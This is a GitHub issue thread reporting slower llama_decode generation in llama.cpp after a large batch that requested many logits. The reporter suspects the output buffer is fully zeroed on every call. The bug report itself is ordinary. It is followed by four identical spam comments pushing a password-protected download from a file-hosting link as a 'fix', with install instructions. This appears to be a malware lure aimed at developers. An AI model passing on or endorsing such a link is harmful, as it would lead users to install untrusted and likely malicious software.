### ISSUE TITLE
Bug: Worse llama_decode performance during generation after evaluated big batch with large number of output logits requested

### ISSUE THREAD

**Issue by ivodopyanov** [ggerganov/llama.cpp#9200]
### What happened?

When I'm making following calls to llama_decode:

1. Evaluate large batch of tokens with all batch.logits[i] = False.
2. Evaluate multiple times batches of 1 token with batch.logits[0] = True
3. Evaluate large batch of tokens with all or many batch.logits[i] = True

and repeat it again, then on the second run step 2 runs noticeably slower. Steps 1 and 3 run in the same time.

I suspect this might be happening because on the second run output buffer ctx.buf_output remain same large size as was resized in step 3, and it gets resetted whole with 0 with every llama_decode call despite only first n_vocab elements are required.

### Name and Version

I'm using llama-cpp-python==0.2.89

### What operating system are you seeing the problem on?

Windows

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
